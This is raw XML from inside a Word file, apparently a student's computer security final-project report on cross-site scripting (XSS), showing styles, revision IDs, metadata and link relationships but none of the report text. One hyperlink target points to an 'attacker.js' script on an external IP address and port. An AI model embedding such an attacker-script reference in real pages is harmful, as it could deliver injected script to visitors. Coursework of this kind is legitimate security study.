    <w:rsid w:val="007E5D58"/>
    <w:rsid w:val="007F0C24"/>
    <w:rsid w:val="007F7D07"/>
    <w:rsid w:val="00801991"/>
    <w:rsid w:val="008026F1"/>
    <w:rsid w:val="00803CAA"/>
    <w:rsid w:val="008054C1"/>
    <w:rsid w:val="00813E40"/>
    <w:rsid w:val="00820641"/>
    <w:rsid w:val="00821C60"/>
    <w:rsid w:val="008224DE"/>
    <w:rsid w:val="00825377"/>
    <w:rsid w:val="008262D2"/>
    <w:rsid w:val="008262F0"/>
    <w:rsid w:val="00827ED4"/>
    <w:rsid w:val="00833D7A"/>
    <w:rsid w:val="0083679A"/>
    <w:rsid w:val="008369BD"/>
    <w:rsid w:val="00837DA7"/>
    <w:rsid w:val="008407B9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A4DDA"/>
    <w:rsid w:val="008C0170"/>
    <w:rsid w:val="008D0FC4"/>
    <w:rsid w:val="008D330C"/>
    <w:rsid w:val="008D5B6A"/>
    <w:rsid w:val="008F205B"/>
    <w:rsid w:val="008F5CAB"/>
    <w:rsid w:val="00901D59"/>
    <w:rsid w:val="009044D9"/>
    <w:rsid w:val="00906F80"/>
    <w:rsid w:val="009118FD"/>
    <w:rsid w:val="00920397"/>
    <w:rsid w:val="009275AB"/>
    <w:rsid w:val="00932EC0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2309"/>
    <w:rsid w:val="009735D3"/>
    <w:rsid w:val="00974D38"/>
    <w:rsid w:val="00982793"/>
    <w:rsid w:val="00983338"/>
    <w:rsid w:val="00983B18"/>
    <w:rsid w:val="009870A5"/>
    <w:rsid w:val="00994D49"/>
    <w:rsid w:val="009A2EEF"/>
    <w:rsid w:val="009A39CF"/>
    <w:rsid w:val="009A7FED"/>
    <w:rsid w:val="009B0551"/>
    <w:rsid w:val="009B1BF2"/>
    <w:rsid w:val="009B4C98"/>
    <w:rsid w:val="009B6640"/>
    <w:rsid w:val="009C20F8"/>
    <w:rsid w:val="009C22E8"/>
    <w:rsid w:val="009C2DDF"/>
    <w:rsid w:val="009C434F"/>
    <w:rsid w:val="009D3D32"/>
    <w:rsid w:val="009D400C"/>
    <w:rsid w:val="009D4A3D"/>
    <w:rsid w:val="009D5448"/>
    <w:rsid w:val="009D7956"/>
    <w:rsid w:val="009E50E0"/>
    <w:rsid w:val="009F0532"/>
    <w:rsid w:val="009F42ED"/>
    <w:rsid w:val="009F644F"/>
    <w:rsid w:val="00A01168"/>
    <w:rsid w:val="00A03BCD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7325A"/>
    <w:rsid w:val="00A77DDB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D0E86"/>
    <w:rsid w:val="00AE166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37CEB"/>
    <w:rsid w:val="00B42BC5"/>
    <w:rsid w:val="00B46520"/>
    <w:rsid w:val="00B530F7"/>
    <w:rsid w:val="00B53BD3"/>
    <w:rsid w:val="00B553AD"/>
    <w:rsid w:val="00B619BD"/>
    <w:rsid w:val="00B61A05"/>
    <w:rsid w:val="00B713A6"/>
    <w:rsid w:val="00B73845"/>
    <w:rsid w:val="00B73A45"/>
    <w:rsid w:val="00B74BC4"/>
    <w:rsid w:val="00B76161"/>
    <w:rsid w:val="00B7745C"/>
    <w:rsid w:val="00B907F7"/>
    <w:rsid w:val="00B922EE"/>
    <w:rsid w:val="00BA1547"/>
    <w:rsid w:val="00BA5102"/>
    <w:rsid w:val="00BA5F05"/>
    <w:rsid w:val="00BA621D"/>
    <w:rsid w:val="00BA6653"/>
    <w:rsid w:val="00BB0FB5"/>
    <w:rsid w:val="00BC5E70"/>
    <w:rsid w:val="00BD2561"/>
    <w:rsid w:val="00BD2690"/>
    <w:rsid w:val="00BE14A1"/>
    <w:rsid w:val="00BE2E60"/>
    <w:rsid w:val="00BE35E1"/>
    <w:rsid w:val="00BE7FBB"/>
    <w:rsid w:val="00BF48FC"/>
    <w:rsid w:val="00BF490B"/>
    <w:rsid w:val="00BF59AC"/>
    <w:rsid w:val="00BF6024"/>
    <w:rsid w:val="00BF6823"/>
    <w:rsid w:val="00BF6EB9"/>
    <w:rsid w:val="00C03804"/>
    <w:rsid w:val="00C05BEC"/>
    <w:rsid w:val="00C158B2"/>
    <w:rsid w:val="00C17EC2"/>
    <w:rsid w:val="00C22ABA"/>
    <w:rsid w:val="00C230AD"/>
    <w:rsid w:val="00C24C85"/>
    <w:rsid w:val="00C40292"/>
    <w:rsid w:val="00C54D24"/>
    <w:rsid w:val="00C569F2"/>
    <w:rsid w:val="00C573E1"/>
    <w:rsid w:val="00C60843"/>
    <w:rsid w:val="00C6197B"/>
    <w:rsid w:val="00C631AB"/>
    <w:rsid w:val="00C65C4F"/>
    <w:rsid w:val="00C76BCD"/>
    <w:rsid w:val="00C81EC9"/>
    <w:rsid w:val="00C92BBE"/>
    <w:rsid w:val="00C92F74"/>
    <w:rsid w:val="00C95CD8"/>
    <w:rsid w:val="00CA225E"/>
    <w:rsid w:val="00CA69CC"/>
    <w:rsid w:val="00CB0EF7"/>
    <w:rsid w:val="00CB144B"/>
    <w:rsid w:val="00CD0099"/>
    <w:rsid w:val="00CD3A6B"/>
    <w:rsid w:val="00CE279D"/>
    <w:rsid w:val="00CE4508"/>
    <w:rsid w:val="00CE5505"/>
    <w:rsid w:val="00CF34D9"/>
    <w:rsid w:val="00D0034B"/>
    <w:rsid w:val="00D02A7F"/>
    <w:rsid w:val="00D07D5E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6CD6"/>
    <w:rsid w:val="00DD752A"/>
    <w:rsid w:val="00DE3867"/>
    <w:rsid w:val="00DF49E7"/>
    <w:rsid w:val="00DF5D05"/>
    <w:rsid w:val="00DF5FC6"/>
    <w:rsid w:val="00E00819"/>
    <w:rsid w:val="00E02538"/>
    <w:rsid w:val="00E0708B"/>
    <w:rsid w:val="00E0745B"/>
    <w:rsid w:val="00E10CF3"/>
    <w:rsid w:val="00E1187E"/>
    <w:rsid w:val="00E126AA"/>
    <w:rsid w:val="00E16BD1"/>
    <w:rsid w:val="00E203FA"/>
    <w:rsid w:val="00E23519"/>
    <w:rsid w:val="00E23922"/>
    <w:rsid w:val="00E26F2A"/>
    <w:rsid w:val="00E37F59"/>
    <w:rsid w:val="00E44E72"/>
    <w:rsid w:val="00E507FF"/>
    <w:rsid w:val="00E5106C"/>
    <w:rsid w:val="00E77D5E"/>
    <w:rsid w:val="00E833AD"/>
    <w:rsid w:val="00E854AC"/>
    <w:rsid w:val="00E87B32"/>
    <w:rsid w:val="00E9289F"/>
    <w:rsid w:val="00EA230D"/>
    <w:rsid w:val="00EA34D6"/>
    <w:rsid w:val="00EA443B"/>
    <w:rsid w:val="00EA47D3"/>
    <w:rsid w:val="00EA489E"/>
    <w:rsid w:val="00EA6B42"/>
    <w:rsid w:val="00EB2897"/>
    <w:rsid w:val="00EB417C"/>
    <w:rsid w:val="00EC024E"/>
    <w:rsid w:val="00EC32D6"/>
    <w:rsid w:val="00ED5644"/>
    <w:rsid w:val="00ED7700"/>
    <w:rsid w:val="00EE20D3"/>
    <w:rsid w:val="00EE5056"/>
    <w:rsid w:val="00EE7011"/>
    <w:rsid w:val="00EF135E"/>
    <w:rsid w:val="00EF1A82"/>
    <w:rsid w:val="00EF4205"/>
    <w:rsid w:val="00EF50A9"/>
    <w:rsid w:val="00EF678B"/>
    <w:rsid w:val="00EF74F5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12BC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D6546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E1187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E1187E"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0070C0"/>
      <w:sz w:val="24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  <w:style w:type="character" w:styleId="ae">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00000344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000344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E1187E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E1187E"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0070C0"/>
      <w:sz w:val="24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E1187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</w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E1187E"/>
    <w:pPr>
      <w:spacing w:before="120"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="24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E1187E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3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E1187E"/>
    <w:pPr>
      <w:ind w:left="420"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi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E1187E"/>
    <w:pPr>
      <w:ind w:left="630"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts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E1187E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E1187E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E1187E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E1187E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E1187E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1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header" Target="header1.xml"/><Relationship Id="rId79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yperlink" Target="http://13.58.241.86:8888/js/attacker.js" TargetMode="External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footer" Target="footer2.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/EnzeXu/Computer_Security_Enze_Xu_Final_Project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://www.xsslabelgg.com" TargetMode="External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hyperlink" Target="https://github.com/EnzeXu/Computer_Security_Enze_Xu_Final_Project" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3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github.com/WFU-Alqahtani/final-project-xss-EnzeXu.git" TargetMode="External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1</Pages>
  <Words>2299</Words>
  <Characters>13109</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>109</Lines>
  <Paragraphs>30</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1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Xu Enze</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <cp:lastPrinted>2021-12-07T04:18:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-07T04:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-07T04:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>